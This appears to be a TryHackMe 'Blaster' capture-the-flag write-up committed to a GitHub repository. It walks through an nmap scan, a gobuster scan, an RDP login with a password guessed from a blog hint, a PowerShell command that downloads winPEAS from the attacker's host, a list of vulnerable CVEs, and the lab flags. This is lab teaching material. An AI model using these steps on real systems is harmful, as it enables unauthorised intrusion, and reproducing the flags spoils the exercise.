mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Add files via upload
This commit is contained in:
parent
ef4ba1c5ed
commit
b3718cdadb
1 changed files with 211 additions and 0 deletions
211
TryHackMe/Blaster.md
Normal file
211
TryHackMe/Blaster.md
Normal file
|
@ -0,0 +1,211 @@
|
||||||
|
# TryHackMe-Blaster CTF
|
||||||
|
|
||||||
|
>Abdullah Rizwan | 17th September , 06:19 PM
|
||||||
|
|
||||||
|
|
||||||
|
## NMAP
|
||||||
|
|
||||||
|
```
|
||||||
|
export IP=10.10.74.61
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Now we want to scan all ports that are open on the box so for this we are going to use `-p-` ports `-A` aggressive scan to look for all ports `-T4` is the speed of the result and `$IP` is IP variable.
|
||||||
|
|
||||||
|
```
|
||||||
|
nmap -p- -A -T4 $IP
|
||||||
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
Host is up (0.22s latency).
|
||||||
|
Not shown: 65520 closed ports
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
80/tcp open http Microsoft IIS httpd 10.0
|
||||||
|
| http-methods:
|
||||||
|
|_ Potentially risky methods: TRACE
|
||||||
|
|_http-server-header: Microsoft-IIS/10.0
|
||||||
|
|_http-title: IIS Windows Server
|
||||||
|
135/tcp open msrpc Microsoft Windows RPC
|
||||||
|
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||||||
|
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|
||||||
|
3306/tcp open mysql MySQL (unauthorized)
|
||||||
|
3389/tcp open ms-wbt-server Microsoft Terminal Services
|
||||||
|
| rdp-ntlm-info:
|
||||||
|
| Target_Name: RETROWEB
|
||||||
|
| NetBIOS_Domain_Name: RETROWEB
|
||||||
|
| NetBIOS_Computer_Name: RETROWEB
|
||||||
|
| DNS_Domain_Name: RetroWeb
|
||||||
|
| DNS_Computer_Name: RetroWeb
|
||||||
|
| Product_Version: 10.0.14393
|
||||||
|
|_ System_Time: 2020-09-17T13:37:30+00:00
|
||||||
|
| ssl-cert: Subject: commonName=RetroWeb
|
||||||
|
| Not valid before: 2020-05-21T21:44:38
|
||||||
|
|_Not valid after: 2020-11-20T21:44:38
|
||||||
|
|_ssl-date: 2020-09-17T13:37:36+00:00; -1s from scanner time.
|
||||||
|
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||||
|
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||||||
|
|_http-title: Not Found
|
||||||
|
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||||
|
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||||||
|
|_http-title: Not Found
|
||||||
|
49664/tcp open msrpc Microsoft Windows RPC
|
||||||
|
49665/tcp open msrpc Microsoft Windows RPC
|
||||||
|
49666/tcp open msrpc Microsoft Windows RPC
|
||||||
|
49667/tcp open msrpc Microsoft Windows RPC
|
||||||
|
49669/tcp open msrpc Microsoft Windows RPC
|
||||||
|
49670/tcp open msrpc Microsoft Windows RPC
|
||||||
|
49678/tcp open msrpc Microsoft Windows RPC
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.80%E=4%D=9/17%OT=80%CT=1%CU=33259%PV=Y%DS=2%DC=T%G=Y%TM=5F6366A
|
||||||
|
OS:A)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5
|
||||||
|
OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
|
||||||
|
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
|
||||||
|
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
|
||||||
|
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
|
||||||
|
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
|
||||||
|
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
|
||||||
|
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
|
||||||
|
OS:N%T=80%CD=Z)
|
||||||
|
|
||||||
|
Network Distance: 2 hops
|
||||||
|
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
|
||||||
|
|
||||||
|
Host script results:
|
||||||
|
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|
||||||
|
| smb-security-mode:
|
||||||
|
| authentication_level: user
|
||||||
|
| challenge_response: supported
|
||||||
|
|_ message_signing: disabled (dangerous, but default)
|
||||||
|
| smb2-security-mode:
|
||||||
|
| 2.02:
|
||||||
|
|_ Message signing enabled but not required
|
||||||
|
| smb2-time:
|
||||||
|
| date: 2020-09-17T13:37:29
|
||||||
|
|_ start_date: 2020-09-17T13:23:20
|
||||||
|
|
||||||
|
TRACEROUTE (using port 143/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 175.30 ms 10.8.0.1
|
||||||
|
2 228.68 ms 10.10.74.61
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
Nmap done: 1 IP address (1 host up) scanned in 786.80 seconds
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Web server is on http://10.10.74.61:80/
|
||||||
|
|
||||||
|
## Gobuster
|
||||||
|
|
||||||
|
```
|
||||||
|
gobuster dir -u 10.10.74.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||||
|
===============================================================
|
||||||
|
Gobuster v3.0.1
|
||||||
|
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||||||
|
===============================================================
|
||||||
|
[+] Url: http://10.10.74.61
|
||||||
|
[+] Threads: 10
|
||||||
|
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||||
|
[+] Status codes: 200,204,301,302,307,401,403
|
||||||
|
[+] User Agent: gobuster/3.0.1
|
||||||
|
[+] Timeout: 10s
|
||||||
|
===============================================================
|
||||||
|
2020/09/17 09:45:48 Starting gobuster
|
||||||
|
===============================================================
|
||||||
|
/retro (Status: 301)
|
||||||
|
Progress: 7068 / 220561 (3.20%)
|
||||||
|
[!] Keyboard interrupt detected, terminating.
|
||||||
|
===============================================================
|
||||||
|
2020/09/17 09:50:04 Finished
|
||||||
|
|
||||||
|
```
|
||||||
|
By visiting the directory `/retro` we will find a username `Wade`.
|
||||||
|
|
||||||
|
|
||||||
|
By going through the page we will see a post
|
||||||
|
|
||||||
|
```
|
||||||
|
Ready Player One
|
||||||
|
|
||||||
|
by Wade
|
||||||
|
|
||||||
|
I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!
|
||||||
|
|
||||||
|
```
|
||||||
|
Now by googling the name of the avatar we will find `Parzival` which is the passworrd for `Wade`.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Remmina (RDP)
|
||||||
|
|
||||||
|
Remmina is RDP client for linux
|
||||||
|
|
||||||
|
Simply launch the application and in the username insert `wade` in password `parzival` and you will be logged into windows machine.
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
THM{HACK_PLAYER_ONE}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
Now that we have access to the machine we can run `winPEAS` on it to do that we first need to host it on our local machine
|
||||||
|
|
||||||
|
```
|
||||||
|
python -m SimpleHTTPServer
|
||||||
|
Serving HTTP on 0.0.0.0 port 8000 ...
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Then open powershell on target machine since `curl` isn't available.
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-WebRequest http://10.8.94.60:8000/winPEAS.exe -O winPEAS.exe
|
||||||
|
```
|
||||||
|
And run the file.
|
||||||
|
|
||||||
|
```
|
||||||
|
[!] CVE-2019-0836 : VULNERABLE
|
||||||
|
[>] https://exploit-db.com/exploits/46718
|
||||||
|
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
|
||||||
|
|
||||||
|
[!] CVE-2019-0841 : VULNERABLE
|
||||||
|
[>] https://github.com/rogue-kdc/CVE-2019-0841
|
||||||
|
[>] https://rastamouse.me/tags/cve-2019-0841/
|
||||||
|
|
||||||
|
[!] CVE-2019-1064 : VULNERABLE
|
||||||
|
[>] https://www.rythmstick.net/posts/cve-2019-1064/
|
||||||
|
|
||||||
|
[!] CVE-2019-1130 : VULNERABLE
|
||||||
|
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
|
||||||
|
|
||||||
|
[!] CVE-2019-1253 : VULNERABLE
|
||||||
|
[>] https://github.com/padovah4ck/CVE-2019-1253
|
||||||
|
|
||||||
|
[!] CVE-2019-1315 : VULNERABLE
|
||||||
|
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
|
||||||
|
|
||||||
|
[!] CVE-2019-1385 : VULNERABLE
|
||||||
|
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg
|
||||||
|
|
||||||
|
[!] CVE-2019-1388 : VULNERABLE
|
||||||
|
[>] https://github.com/jas502n/CVE-2019-1388
|
||||||
|
|
||||||
|
[!] CVE-2019-1405 : VULNERABLE
|
||||||
|
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
|
||||||
|
|
||||||
|
```
|
||||||
|
You will see theses CVE's which are vulnerable to this machine for me internet explorer wasn't showing history so this method also works.
|
||||||
|
|
||||||
|
|
||||||
|
## Previlege Esacalation
|
||||||
|
|
||||||
|
This is the video which helps to escalate our privileges.
|
||||||
|
|
||||||
|
https://www.youtube.com/watch?v=3BQKpPNlTSo
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
THM{COIN_OPERATED_EXPLOITATION}
|
||||||
|
```
|
||||||
|
This is the root flag.
|
Loading…
Reference in a new issue